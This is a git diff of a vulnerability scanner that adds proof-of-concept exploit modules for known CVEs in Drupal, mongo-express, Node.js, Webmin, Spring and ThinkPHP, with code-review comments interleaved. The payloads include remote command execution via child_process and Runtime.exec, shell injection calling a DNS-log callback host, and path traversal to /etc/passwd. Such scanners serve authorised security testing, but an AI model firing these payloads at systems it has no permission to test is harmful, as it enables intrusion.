+ vul_info['vul_type'] = 'unSerialize'
+ vul_info['vul_id'] = 'CVE-2017-6920'
+ vul_info['vul_method'] = 'POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2017_6920_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('PHP Version' in res.text) and ('PHP License' in res.text)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': res
+ }
+ return results
+
+ def cve_2018_7602_scan(self, url):
+ ''' 对URL中的#进行编码两次, 即可绕过sanitize()函数的过滤 '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2018-7602'
+ vul_info['vul_method'] = 'POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in range(len(self.cve_2018_7602_payloads)):
+ path = self.cve_2018_7602_payloads[payload]['path']
+ data = self.cve_2018_7602_payloads[payload]['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ if payload == 0: # * 当payload为第1个时, 获取form_token
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ form_token = re.search(r'name="form_token" value=".{43}', res.text, re.I|re.M|re.U|re.S)
+ if (form_token):
+ self.form_token = form_token.group().replace('name="form_token" value="', '')
+ else:
+ return None
+
+ elif payload == 1: # * 当payload为第2个时, 注入命令
+ data = data.format(self.form_token) # * 添加form_token
+
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ form_build_id = re.search(r'name="form_build_id" value="form-.{43}', res.text, re.I|re.M|re.U|re.S)
+ if (form_build_id):
+ self.form_build_id = form_build_id.group().replace('name="form_build_id" value="', '')
+ else:
+ return None
+
+ elif payload == 2: # * 当payload为第3个时, 查看回显
+ target += self.form_build_id # * 添加form_build_id
+ data += self.form_build_id
+
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (self.md in check.check_res(res.text, self.md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload-1': {
+ 'Method': 'GET',
+ 'Url': url,
+ 'Path': self.cve_2018_7602_payloads[0]['path']
+ },
+ 'Payload-2': {
+ 'Method': 'POST',
+ 'Url': url,
+ 'Path': self.cve_2018_7602_payloads[1]['path'],
+ 'Data': self.cve_2018_7602_payloads[1]['data'].format(self.form_token),
+ 'form_token': self.form_token
+ },
+ 'Payload-3': {
+ 'Method': 'POST',
'Url': url,
'Path': path,
- 'Data': data
+ 'Data': data,
+ 'form_build_id': self.form_build_id
}
}
return results
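Review bot: cve_2018_7602_scan keeps per-target state on the shared singleton (`self.form_token` and `self.form_build_id` are set inside the loop and read again when building `Payload-2`/`Payload-3`), but `drupal = Drupal()` is module-level and addscan hands the method to `thread`, so two targets scanned concurrently can overwrite each other's token between the payload that captures it and the one that uses it — how far this bites depends on the thread helper's scheduling, which is outside the diff. Locals carry the state for exactly one call, and `for payload in range(len(...))` can become `enumerate` at the same time. Requests, logging and the except clauses stay as they are. The function may continue past the last line of the hunk.
```python
        form_token = None       # per-call state; do not keep these on self
        form_build_id = None
        for index, payload in enumerate(self.cve_2018_7602_payloads):
            path = payload['path']
            data = payload['data']
            target = url + path
            # … unchanged: vul_info bookkeeping …
            try:
                if index == 0:  # first payload: capture form_token
                    # … unchanged: GET request and logging …
                    match = re.search(r'name="form_token" value=".{43}', res.text, re.I|re.M|re.U|re.S)
                    if not match:
                        return None
                    form_token = match.group().replace('name="form_token" value="', '')
                elif index == 1:  # second payload: submit with the captured token
                    data = data.format(form_token)
                    # … unchanged: POST request and logging …
                    match = re.search(r'name="form_build_id" value="form-.{43}', res.text, re.I|re.M|re.U|re.S)
                    if not match:
                        return None
                    form_build_id = match.group().replace('name="form_build_id" value="', '')
                elif index == 2:  # third payload: read back the result
                    target += form_build_id
                    data += form_build_id
                    # … unchanged: POST request and logging …
            # … unchanged: except clauses …
        # … unchanged: result dict, with self.form_token / self.form_build_id replaced by the locals …
```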
@@ -98,7 +355,10 @@ def addscan(self, url, vuln=None):
return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
return [
- thread(target=self.cve_2018_7600_scan, url=url)
+ thread(target=self.cve_2018_7600_scan, url=url),
+ thread(target=self.cve_2014_3704_scan, url=url),
+ thread(target=self.cve_2017_6920_scan, url=url),
+ thread(target=self.cve_2018_7602_scan, url=url)
]
drupal = Drupal()
diff --git a/payloads/ElasticSearch.py b/payloads/ElasticSearch.py
index 30b0e27..fe6ff92 100644
--- a/payloads/ElasticSearch.py
+++ b/payloads/ElasticSearch.py
@@ -159,12 +159,7 @@ def cve_2014_3120_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
@@ -215,12 +210,7 @@ def cve_2015_1427_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
@@ -353,7 +343,8 @@ def cve_2015_5531_scan(self, url):
'Payload': {
'Url': url,
'Path': path,
- 'Prompt': 'ASCII decimal encode'
+ 'Decode': 'ASCII decimal encode',
+ 'Decode-Url': 'https://www.qqxiuzi.cn/bianma/ascii.htm'
}
}
return results
diff --git a/payloads/F5BIGIP.py b/payloads/F5BIGIP.py
index 6fa323e..a720d90 100644
--- a/payloads/F5BIGIP.py
+++ b/payloads/F5BIGIP.py
@@ -198,13 +198,7 @@ def cve_2022_1388_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
diff --git a/payloads/Fastjson.py b/payloads/Fastjson.py
index 1d30408..580dd6a 100644
--- a/payloads/Fastjson.py
+++ b/payloads/Fastjson.py
@@ -115,12 +115,7 @@ def cnvd_2019_22238_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
@@ -177,12 +172,7 @@ def cnvd_2017_02833_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
diff --git a/payloads/Kindeditor.py b/payloads/Kindeditor.py
index f40619f..c6b19fc 100644
--- a/payloads/Kindeditor.py
+++ b/payloads/Kindeditor.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
-''' 还没测试POC准确性, 默认不启用
+''' 还没写好
KindEditor是一套开源的HTML可视化编辑器
Kindeditor扫描类:
Kindeditor 目录遍历
diff --git a/payloads/MongoExpress.py b/payloads/MongoExpress.py
new file mode 100644
index 0000000..7ba8083
--- /dev/null
+++ b/payloads/MongoExpress.py
@@ -0,0 +1,127 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+mongo-express是一款mongodb的第三方Web界面, 使用node和express开发
+ Mongo-Express扫描类:
+ mongo-express 未授权远程代码执行
+ CVE-2019-10758
+ Payload: https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+
+class MongoExpress():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'mongo-express'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2019_10758_payloads = [
+ {
+ 'path': 'checkValid',
+ 'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl DNSdomain")',
+ 'headers': head.merge(self.headers, {
+ 'Authorization': 'Basic YWRtaW46cGFzcw=='
+ })
+
+ },
+ {
+ 'path': 'checkValid',
+ 'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping DNSdomain")',
+ 'headers': head.merge(self.headers, {
+ 'Authorization': 'Basic YWRtaW46cGFzcw=='
+ })
+ },
+ {
+ 'path': 'checkValid',
+ 'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl DNSdomain")',
+ 'headers': head.merge(self.headers, {})
+
+ },
+ {
+ 'path': 'checkValid',
+ 'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping DNSdomain")',
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
+ def cve_2019_10758_scan(self, url):
+ ''' 如果可以成功登录, 或者目标服务器没有修改默认的账号密码(admin:pass), 则可以执行任意node.js代码 '''
+ sessid = '3d2f0881262d8bd19e65a6ce89229c5e'
+
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2019-10758'
+ vul_info['vul_method'] = 'POST'
+
+
+ for payload in self.cve_2019_10758_payloads:
+ md = random_md5() # * 随机md5值, 8位
+ dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名
+
+ path = payload['path']
+ data = payload['data'].replace('DNSdomain', dns_domain)
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ sleep(2)
+ if (md in dns.result(md, sessid)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload': res
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.cve_2019_10758_scan, url=url)
+ ]
+
+mongoexpress = MongoExpress()
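Review bot: `sessid = '3d2f0881262d8bd19e65a6ce89229c5e'` at the top of cve_2019_10758_scan hard-codes a DNS-log session identifier into the source, and the new Nodejs file does the same with a different value. Every copy of the tool then polls the same inbox, so callbacks from one user's scans are visible to anyone else running it (inferred — the `dns` API is outside this diff), and rotating the identifier means editing code. Read it from the same place as timeout/headers/proxies, e.g. `sessid = config.get('<dnslog-session-key>')` with the key name chosen to match the config loader, and keep the value out of the repository.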
diff --git a/payloads/Nodejs.py b/payloads/Nodejs.py
new file mode 100644
index 0000000..bd301bb
--- /dev/null
+++ b/payloads/Nodejs.py
@@ -0,0 +1,207 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Joyent Node.js是美国Joyent公司的一套建立在Google V8 JavaScript引擎之上的网络应用平台
+ Nodejs扫描类:
+ 1. Node.js 目录穿越
+ CVE-2017-14849
+ Payload: https://vulhub.org/#/environments/node/CVE-2017-14849/
+
+ 2. Node.js 命令执行
+ CVE-2021-21315
+ Payload: https://blog.csdn.net/weixin_47179815/article/details/125799014
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from thirdparty import requests
+from time import sleep
+
+class Nodejs():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'Node.js'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2017_14849_payloads = [
+ {
+ 'path': 'static/%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': '%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': 'static/%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts',
+ 'data': ''
+ },
+ {
+ 'path': '%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\\Windows\\System32\\drivers\\etc\\hosts',
+ 'data': ''
+ }
+ ]
+
+ self.cve_2021_21315_payloads = [
+ {
+ 'path': 'api/getServices?name[]=$(curl DNSdomain)',
+ 'data': ''
+ },
+ {
+ 'path': 'api/getServices?name[]=$(ping -c 4 DNSdomain)',
+ 'data': ''
+ },
+ {
+ 'path': 'api/getServices?name[]=$(ping DNSdomain)',
+ 'data': ''
+ },
+ {
+ 'path': 'getServices?name[]=$(curl DNSdomain)',
+ 'data': ''
+ },
+ {
+ 'path': 'getServices?name[]=$(ping -c 4 DNSdomain)',
+ 'data': ''
+ },
+ {
+ 'path': 'getServices?name[]=$(ping DNSdomain)',
+ 'data': ''
+ }
+ ]
+
+ def cve_2017_14849_scan(self, url):
+ ''' Joyent Node.js 8.6.0之前的8.5.0版本中存在安全漏洞
+ 远程攻击者可利用该漏洞访问敏感文件
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'File-Read'
+ vul_info['vul_id'] = 'CVE-2017-14849'
+ vul_info['vul_method'] = 'GET'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2017_14849_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload': res
+ }
+ return results
+
+ def cve_2021_21315_scan(self, url):
+ ''' Node.js库中的systeminformation软件包中存在一个命令注入漏洞,
+ 攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令
+ '''
+ sessid = 'ea16de03573ce0c2f731fa40de93ecd7'
+
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2021-21315'
+ vul_info['vul_method'] = 'GET'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2021_21315_payloads:
+ md = random_md5() # * 随机md5值, 8位
+ dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名
+
+ path = payload['path'].replace('DNSdomain', dns_domain)
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ sleep(2)
+ if (md in dns.result(md, sessid)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload': res
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.cve_2017_14849_scan, url=url),
+ thread(target=self.cve_2021_21315_scan, url=url)
+ ]
+
+nodejs = Nodejs()
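Review bot: The commented-out `# headers = self.headers.copy()` / `# headers.update(vul_info['headers'])` pairs in both scan methods are dead code that also appears three times in the Drupal file of this commit; delete them rather than carry them into new files. Both methods set `vul_info['headers'] = {}` and then send `headers=self.headers`, so `vul_info` does not describe the request that went out — presumably the logger reads `res.request.headers`, but anything that reads `vul_info['headers']` sees an empty dict. The request/`except`/logging scaffold is copied verbatim between cve_2017_14849_scan and cve_2021_21315_scan (and across Discuz, MongoExpress and Drupal); a private `_request(method, target, data, headers, vul_info)` helper would leave each POC with only its payload list and its match condition.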
diff --git a/payloads/ShowDoc.py b/payloads/ShowDoc.py
index f174dbb..0076133 100644
--- a/payloads/ShowDoc.py
+++ b/payloads/ShowDoc.py
@@ -102,22 +102,16 @@ def cnvd_2020_26585_scan(self, url):
except requests.ConnectionError:
logger.logging(vul_info, 'Faild')
return None
- # except:
- # logger.logging(vul_info, 'Error')
- # return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
if ('cnvd/2020/26585' in check.check_res(res2.text, 'cnvd/2020/26585')):
results = {
'Target': target,
'Verify': file_path,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Headers': headers,
- 'Data': data
- }
+ 'Payload': res
}
return results
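Review bot: Re-enabling the bare `except:` after the `requests.ConnectionError` clause also catches `KeyboardInterrupt` and `SystemExit`, so a Ctrl+C during a slow request is logged as 'Error' and swallowed instead of reaching the `KeyboardInterrupt` handler in vulcat.py. Narrow it to `except Exception:` and keep the logging call; the same bare clause is introduced in the new Nodejs.py and Webmin.py scan functions in this commit. The enclosing cnvd_2020_26585_scan starts outside this hunk.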
diff --git a/payloads/Spring.py b/payloads/Spring.py
index 254e53a..75c8c3b 100644
--- a/payloads/Spring.py
+++ b/payloads/Spring.py
@@ -96,6 +96,14 @@ def __init__(self):
'Content-Type': 'text/plain'
})
},
+ {
+ 'path': 'functionRouter',
+ 'data': 'mouse',
+ 'headers': head.merge(self.headers, {
+ 'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("ping -c 4 dnsdomain")',
+ 'Content-Type': 'text/plain'
+ })
+ },
{
'path': 'functionRouter',
'data': 'mouse',
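Review bot: The new routing-expression payload uses the placeholder `dnsdomain`, whereas the equivalent Nodejs.py payload in this commit is templated as `DNSdomain` and substituted with `payload['path'].replace('DNSdomain', dns_domain)`. The substitution for Spring happens in cve_2022_22963_scan outside this hunk, so I cannot confirm which spelling it expects; if they differ, the literal host `dnsdomain` is sent and the DNS-callback check can never match. A comment on the entry naming the exact token, e.g. `# 'dnsdomain' is replaced with the dnslog host in cve_2022_22963_scan`, would tie the two together. `__init__` starts outside this hunk.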
@@ -233,13 +241,7 @@ def cve_2022_22965_scan(self, url):
results = {
'Target': verify_url,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Payload': {
- 'Method': vul_info['vul_method'],
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
@@ -412,13 +414,7 @@ def cve_2022_22963_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': headers
- }
+ 'Payload': res
}
return results
diff --git a/payloads/ThinkPHP.py b/payloads/ThinkPHP.py
index 35909c1..1f70455 100644
--- a/payloads/ThinkPHP.py
+++ b/payloads/ThinkPHP.py
@@ -87,6 +87,11 @@ def __init__(self):
]
self.cve_2018_1002015_payloads = [
+ {
+ 'path': 'index.php?s=index/\\think\\Container/invokefunction',
+ 'data': 'function=call_user_func_array&vars[0]=system&vars[1][]='+self.cmd,
+ 'headers': head.merge(self.headers, {})
+ },
{
'path': 'index.php?s=index/\\think\\Container/invokefunction',
'data': 'function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd',
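Review bot: The new first entry in `cve_2018_1002015_payloads` runs `self.cmd` rather than the `cat /etc/passwd` / phpinfo probes of the existing entries, and it is only detectable through the `self.md in check.check_res(...)` branch added to cve_2018_1002015_scan in a later hunk; nothing here says so. A one-line comment above the entry, e.g. `# detected via self.md in check.check_res(), not the root:x / PHP Version markers`, would keep the payload and its check from drifting apart. `__init__` starts outside this hunk.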
@@ -239,12 +244,7 @@ def cnnvd_201901_445_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
@@ -401,18 +401,14 @@ def cve_2018_1002015_scan(self, url):
return None
if (('root:x:0:0:root' in res.text)
+ or (self.md in check.check_res(res.text, self.md))
or (('PHP Version' in res.text)
and ('PHP License' in res.text))
):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
diff --git a/payloads/Weblogic.py b/payloads/Weblogic.py
index be14a37..34d0eee 100644
--- a/payloads/Weblogic.py
+++ b/payloads/Weblogic.py
@@ -352,13 +352,7 @@ def cve_2019_2725_scan(self, url):
results = {
'Target': verify_url,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
@@ -424,13 +418,7 @@ def cve_2017_10271_scan(self, url):
results = {
'Target': verify_url,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
diff --git a/payloads/Webmin.py b/payloads/Webmin.py
index cd7921c..ad1966f 100644
--- a/payloads/Webmin.py
+++ b/payloads/Webmin.py
@@ -3,12 +3,15 @@
'''
Webmin是一个基于Web的系统配置工具, 用于类Unix系统: https://www.webmin.com/
-该漏洞存在于密码重置页面,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。
Webmin扫描类:
1. Webmin Pre-Auth 远程代码执行
CVE-2019-15107
Payload: https://vulhub.org/#/environments/webmin/CVE-2019-15107/
+ 2. Webmin 远程代码执行
+ CVE-2019-15642
+ Payload: https://www.seebug.org/vuldb/ssvid-98065
+
file:///etc/passwd
file:///C:\Windows\System32\drivers\etc\hosts
'''
@@ -19,6 +22,7 @@
from lib.tool.logger import logger
from lib.tool.thread import thread
from lib.tool import check
+from lib.tool import head
from thirdparty import requests
from time import sleep
@@ -39,8 +43,28 @@ def __init__(self):
},
]
+ self.cve_2019_15642_payloads = [
+ {
+ 'path': 'rpc.cgi',
+ 'data': 'OBJECT Socket;print "Content-Type: text/plain\\n\\n";$cmd=`{}`; print "$cmd\\n\\n";'.format(self.cmd),
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'rpc.cgi',
+ 'data': 'OBJECT Socket;print "Content-Type: text/plain\\n\\n";$cmd=`{}`; print "$cmd\\n\\n";'.format(self.cmd),
+ 'headers': head.merge(self.headers, {
+ 'User-Agent': 'webmin',
+ 'Accept': 'application/json, text/javascript, */*; q=0.01',
+ 'Accept-Language': 'fr',
+ 'Accept-Encoding': 'gzip, deflate'
+ })
+ },
+ ]
+
def cve_2019_15107_scan(self, url):
- ''' '''
+ ''' 该漏洞存在于密码重置页面(password_change.cgi), 允许未经身份验证的用户通过简单的POST请求执行任意命令
+ 当用户开启Webmin密码重置功能后, 攻击者可以通过发送POST请求在目标系统中执行任意命令, 且无需身份验证。
+ '''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'RCE'
@@ -87,13 +111,59 @@ def cve_2019_15107_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
+ }
+ return results
+
+ def cve_2019_15642_scan(self, url):
+ ''' Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞, 攻击者可借助特制的对象名称利用该漏洞执行代码
+ 需要身份验证(Cookie、Authorization等)
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2019-15642'
+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2019_15642_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ headers['Referer'] = 'https://{}/session_login.cgi'.format(logger.get_domain(url))
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (self.md in check.check_res(res.text, self.md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload': res
}
return results
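Review bot: `headers = payload['headers']` followed by `headers['Referer'] = ...` mutates the dict stored in `self.cve_2019_15642_payloads`, which lives on the module-level `webmin` singleton and is reused by every call; if `thread(...)` runs scans for different targets concurrently (not visible here), two scans can overwrite each other's Referer. Copy before mutating: `headers = dict(payload['headers'])`. The docstring states the endpoint requires authentication (Cookie/Authorization), yet the request only adds a Referer on top of `self.headers`, so unless `self.headers` already carries a session the `self.md in check.check_res(...)` check is expected to fail and the function returns None without logging why; the docstring should say where the credential is expected to come from. The Referer also hard-codes `https://` regardless of the scheme of `url`.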
@@ -102,7 +172,8 @@ def addscan(self, url, vuln=None):
return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
return [
- thread(target=self.cve_2019_15107_scan, url=url)
+ thread(target=self.cve_2019_15107_scan, url=url),
+ thread(target=self.cve_2019_15642_scan, url=url)
]
webmin = Webmin()
diff --git a/payloads/demo.py b/payloads/demo.py
index 925f21b..3567287 100644
--- a/payloads/demo.py
+++ b/payloads/demo.py
@@ -88,6 +88,7 @@ def 6_scan(self, url): # ! 6: POC的名称(例如 c
key1: value1
key2: value2
...
+ Response类型: 会以一个http数据包的格式进行显示
'''
if ('11'): # ! 11: 判断扫描结果
results = {
@@ -97,10 +98,10 @@ def 6_scan(self, url): # ! 6: POC的名称(例如 c
'Payload': {
'Url': url,
